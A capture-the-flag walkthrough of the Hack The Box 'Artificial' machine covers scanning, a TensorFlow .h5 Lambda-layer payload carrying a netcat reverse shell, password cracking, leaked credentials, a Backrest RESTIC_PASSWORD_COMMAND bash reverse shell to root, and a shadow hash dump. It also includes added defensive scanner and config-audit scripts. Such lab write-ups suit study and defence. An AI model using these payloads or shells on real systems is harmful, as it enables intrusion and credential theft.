HTB-Artificial

Box Info

Difficulty Easy
OS Linux
IP Address 10.10.11.74

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.74 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.74 -sCV -Pn -sT -p 22,80
# Nmap scan vulnerability
sudo nmap -sT -p 22,80 --script=vuln -O -Pn 10.10.11.74
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.74

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
| 256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
|_ 256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://artificial.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Update DNS

sudo nano /etc/hosts
10.10.11.74 artificial.htb

Service Enumeration

80/tcp - HTTP

acda8564c37394090d95a43508508264.webp

Register an account

dbf62482938d6db1c35a18470d2715b8.webp

Once logged in, it shows a dashboard that allows us to upload a model

660d57befcf67261c23406e89ba7356c.webp

Check the requirements

5a7aeb4d04d111715240be780da67537.webp

Check the Dockerfile

ceffbf95eb3d61c3114a3ed56f0c88a9.webp

Tensorflow RCE

TensorFlow Remote Code Execution with Malicious Model | CyberBlog

To make it work, we need to create an exploit.h5 file whose Lambda layer imports os and runs the reverse shell command.

a1f72b5bd2e16f0556a0b6bc55a92878.webp

Then we need tensorflow:2.13.0 (the version pinned in the requirements and Dockerfile) to run the Python script; here we use a Docker container to generate the exploit.h5 file

Tensorflow Lambda RCE demo

PoC Tensorflow RCE

Prep the python environment

python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

h5payload.py

import tensorflow as tf

# A Keras Lambda layer serializes its Python function into the .h5 file;
# whatever the function does runs when the model is loaded and evaluated.
def exploit(x):
    # imported inside the function so it is available when the layer is deserialized
    import os
    os.system("rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.xx.xx 9001 >/tmp/f")
    return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")

Then run the Docker container to generate the .h5 payload

mkdir /app
docker run -it --rm -v "$PWD":/app -w /app tensorflow/tensorflow:2.13.0 python3 h5payload.py

a12b6247ccc1db605b0bf5b3726609dc.webp

Upload exploit.h5 to the webpage and trigger it with "View Predictions"

02a54d0d313dbb3e41cc56b47187fb94.webp

Start the listener before triggering the prediction

7f8a2f61f6be26a1c9d1526c9b255e33.webp

Here we obtained a shell as the app user
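From the defender's side, the weakness above is that a Keras .h5 model is executable content: any Lambda layer in it carries serialized Python that runs on load. The following is an added example (not part of the original writeup or of the target application) that inspects the model_config JSON stored in the HDF5 attributes and reports Lambda layers before anything is deserialized. It assumes the Keras 2.x HDF5 layout (a model_config attribute holding the Sequential/Functional config JSON) and h5py for the file reader; the sample configs are constructed inline.

```python
import json

# Layer classes whose deserialization executes code from the file.
DANGEROUS_LAYER_CLASSES = {"Lambda"}


def find_unsafe_layers(model_config: dict, path: str = "") -> list:
    """Walk a Keras model config (the JSON kept in the HDF5 'model_config'
    attribute) and return the paths of layers that run embedded code."""
    hits = []
    class_name = model_config.get("class_name", "")
    cfg = model_config.get("config", {})
    name = cfg.get("name", class_name) if isinstance(cfg, dict) else class_name
    here = f"{path}/{name}" if path else name
    if class_name in DANGEROUS_LAYER_CLASSES:
        hits.append(here)
    if isinstance(cfg, dict):
        # Sequential/Functional models list children under config.layers ...
        for child in cfg.get("layers", []):
            hits.extend(find_unsafe_layers(child, here))
        # ... and wrapper layers (TimeDistributed, Bidirectional) nest one layer.
        inner = cfg.get("layer")
        if isinstance(inner, dict):
            hits.extend(find_unsafe_layers(inner, here))
    return hits


def scan_model_config_json(model_config_json: str) -> list:
    """Scan a model_config JSON string; returns [] when no unsafe layer is present."""
    return find_unsafe_layers(json.loads(model_config_json))


def scan_h5_file(path: str) -> list:
    """Read only the HDF5 attribute; nothing in the model is deserialized.
    Assumes h5py is installed (it is not imported at module level so the
    JSON scanner above works without it)."""
    import h5py
    with h5py.File(path, "r") as f:
        raw = f.attrs.get("model_config")
        if raw is None:
            raise ValueError("not a Keras HDF5 model (no model_config attribute)")
        if isinstance(raw, bytes):
            raw = raw.decode("utf-8")
        return scan_model_config_json(raw)


# Constructed sample: the config shape Keras writes for Input -> Lambda,
# i.e. what the payload generator in this writeup produces.
SAMPLE_MALICIOUS_CONFIG = json.dumps({
    "class_name": "Sequential",
    "config": {"name": "sequential", "layers": [
        {"class_name": "InputLayer", "config": {"name": "input_1", "batch_input_shape": [None, 64]}},
        {"class_name": "Lambda", "config": {"name": "lambda", "function": ["<marshalled code>", None, None]}},
    ]},
})

# Constructed sample of a harmless model for comparison.
SAMPLE_BENIGN_CONFIG = json.dumps({
    "class_name": "Sequential",
    "config": {"name": "sequential", "layers": [
        {"class_name": "InputLayer", "config": {"name": "input_1", "batch_input_shape": [None, 64]}},
        {"class_name": "Dense", "config": {"name": "dense", "units": 1}},
    ]},
})

if __name__ == "__main__":
    import sys
    for model_path in sys.argv[1:]:
        hits = scan_h5_file(model_path)
        print(f"{model_path}: {'REJECT ' + ', '.join(hits) if hits else 'no Lambda layers'}")
```

An upload endpoint that accepts user models should reject anything this scanner flags; allow-listing the layer classes a service expects (Dense, Conv2D, ...) is the stricter version of the same check.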

Initiate User Foothold

Explore app user

Inside the app user's app folder, the app.py script leaks the secret_key

app = Flask(__name__)
app.secret_key = "Sup3rS3cr3tKey4rtIfici4L"

app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///users.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['UPLOAD_FOLDER'] = 'models'

f0490b26705ce327ce60656bae5a8e69.webp

The users.db file is located at ~/app/instance/

d1aa1a6f5215f87d8d4871972dc55a6e.webp

Download it to the local Kali machine and check all the users' hashed passwords

50cfd549e714585fff0d66ca08d18e1e.webp

Brute force password

john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt gael.hash

2274549e2ac89d67aa5b13529ea7e054.webp

b72dfea01417f8f8dd7cec1ca39227dc.webp

Only the gael and royer hashes were cracked. Validate them with netexec

nxc ssh 10.10.11.74 -u user.txt -p pass.txt --continue-on-success

dbc440ce38b518fcd599abc34ed1c3a9.webp

gael : mattp005numbertwo

Gael SSH

ssh gael@10.10.11.74

99ed11c990b9fefff172c7af9953804b.webp

User Flag

0b1643719b7e71d6b83ca6ec53d3d92d.webp

Privilege Escalation

LinPEAS

sqlite

cd59b8b03371a3a0dfdb70a539b35ca3.webp

GROUP writeable file

4e98a1341438378961256ab0ac7cb9aa.webp

Local listening port

ca3e6aecc25fd6910baa0524166f88bd.webp

9898/tcp - Backrest

Port forward to local KALI

ssh -L 9898:127.0.0.1:9898 gael@10.10.11.74

f3c6ffb71dfcdb6fab97ccd55cc74b87.webp

It is **Backrest 1.7.2**. Tested with the credentials we have so far, but none of them could log in. Checking the LinPEAS output again, there is a directory named backrest in /opt

2d1ab2f6dbc83254872084704bb09587.webp

Inside install.sh there is a config file used to perform backups with restic

fd7dbfc2fc5441b1c39b62d95e0e2b7a.webp

Upon checking /var/backups, found a backrest_backup.tar.gz

1840833f32ab617c00e53319710da7f1.webp

Extract it and check what we can get from this tar file

tar -xvf backrest_backup.tar.gz

Here it leaks the backrest_root credentials

d46010fcdc36702f2c4820d2f105dfa1.webp

backrest/.config/config.json

{
  "modno": 2,
  "version": 4,
  "instance": "Artificial",
  "auth": {
    "disabled": false,
    "users": [
      {
        "name": "backrest_root",
        "passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
      }
    ]
  }
}

Brute force backrest_root Bcrypt

985b6287b6c719123b6280510b15c27d.webp

john --format=bcrypt -w /usr/share/wordlists/rockyou.txt backrest_root.hash

565cc35319a8dfd0b04c513d223fa0bc.webp

backrest_root : !@#$%^

Initiate Root Foothold

Backrest Dashboard

Used the credentials found to log in, which leads to the dashboard

6594c3d9d601f27c6efa63a7330d2d3a.webp

https://github.com/garethgeorge/backrest

Getting Started

ecdf4dc07733c0e0bc296cae64fd722d.webp

When adding a restic repo, the Env Vars section shows the requirement for RESTIC_PASSWORD, and there is an interesting env var, RESTIC_PASSWORD_COMMAND. Perhaps I can abuse it with a normal bash command

RESTIC_PASSWORD_COMMAND=bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1'

1c3ddc3ed5bf6b7f2bc09879d7952d94.webp

When pressing Test Configuration, the command runs!
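Two things in the Backrest part of this box are worth checking on any real deployment: the passwordBcrypt field in config.json is only base64 of a bcrypt string whose cost can be read directly, and a repo environment containing RESTIC_PASSWORD_COMMAND means the service executes an operator-supplied shell command with its own privileges (root here). The following is an added example, not part of the writeup or of the Backrest project, that audits a Backrest config.json for both conditions. It assumes the auth/users layout shown in the config above and, as an assumption, that repos carry their environment as "KEY=VALUE" strings under a "repos[].env" list; the sample config and hash are constructed, not taken from the target.

```python
import base64
import binascii

MIN_BCRYPT_COST = 12  # assumed policy for an admin account on a root-level service


def decode_backrest_bcrypt(password_bcrypt: str) -> str:
    """passwordBcrypt is base64('$2a$NN$...'); return the modular-crypt string."""
    return base64.b64decode(password_bcrypt).decode()


def bcrypt_cost(hash_str: str) -> int:
    """Parse the cost parameter NN from '$2a$NN$<salt+digest>'."""
    parts = hash_str.split("$")
    if len(parts) < 4 or parts[1] not in ("2a", "2b", "2y"):
        raise ValueError("not a bcrypt hash")
    return int(parts[2])


def audit_backrest_config(cfg: dict) -> list:
    """Return human-readable findings for a parsed Backrest config.json."""
    findings = []
    auth = cfg.get("auth", {})
    if auth.get("disabled"):
        findings.append("auth: disabled, dashboard reachable without login")
    for user in auth.get("users", []):
        try:
            cost = bcrypt_cost(decode_backrest_bcrypt(user.get("passwordBcrypt", "")))
        except (ValueError, binascii.Error):
            findings.append(f"user {user.get('name')}: unparseable passwordBcrypt")
            continue
        if cost < MIN_BCRYPT_COST:
            findings.append(f"user {user.get('name')}: bcrypt cost {cost} below "
                            f"{MIN_BCRYPT_COST}, offline cracking is cheap")
    # Assumption: each repo lists its environment as "KEY=VALUE" strings in 'env'.
    for repo in cfg.get("repos", []):
        for entry in repo.get("env", []):
            key, _, value = entry.partition("=")
            if key == "RESTIC_PASSWORD_COMMAND":
                findings.append(f"repo {repo.get('id')}: RESTIC_PASSWORD_COMMAND runs "
                                f"'{value}' as the Backrest service user on every restic call")
    return findings


# Constructed sample: bcrypt-shaped placeholder (not a real hash) encoded the way
# Backrest stores it, plus one repo that uses a password command.
SAMPLE_HASH = "$2a$10$" + "c" * 53
SAMPLE_HASH_B64 = base64.b64encode(SAMPLE_HASH.encode()).decode()
SAMPLE_CONFIG = {
    "modno": 2,
    "version": 4,
    "instance": "example",
    "auth": {"disabled": False,
             "users": [{"name": "backrest_root", "passwordBcrypt": SAMPLE_HASH_B64}]},
    "repos": [{"id": "local", "uri": "/srv/restic-repo",
               "env": ["RESTIC_PASSWORD_COMMAND=cat /etc/restic/password"]}],
}

if __name__ == "__main__":
    import json
    import sys
    cfg = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_CONFIG
    for finding in audit_backrest_config(cfg):
        print("-", finding)
```

The mitigation that matters most here is not in the config file at all: a backup orchestrator that lets a dashboard user define commands should not run as root, so that an account takeover on the web interface stays limited to the backup service's own privileges.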

70cdbf6c19b3cb9fe36bc0e1d0596f69.webp

Root flag

aadf0486ab4f99ded61d196e3221f6fc.webp

Hashdump

root:$6$UUrrHE6LTPdhmLil$v9nJaHljuUC0gR5HBAqVWvnDVgYoNYE6EvjIEGNykwadZ8w8gOu212j5bipzK72.nBtx/0h4z4CPki/Ac2f1i1:20015:0:99999:7:::
gael:$6$ZgkOwXDgoK.yOfv9$7gGQcVFbMepHAPCW.qS/1z87V5p15x4RokWKwNvFXqwo3QLEfFx2GaJs1JqbZ81i/uLy7bJ8TYk4dQYXQpeEC0:20015:0:99999:7:::
app:$6$1CKnP41b8QhfYnAx$b88.zZJfVQ84SBkePAyzIsXdA/w6wvUVq4c2ExOho0RIY8iS43bdJbBPHYdttqqNvBV.H6noc2EFkdBlbb5WL.:20015:0:99999:7:::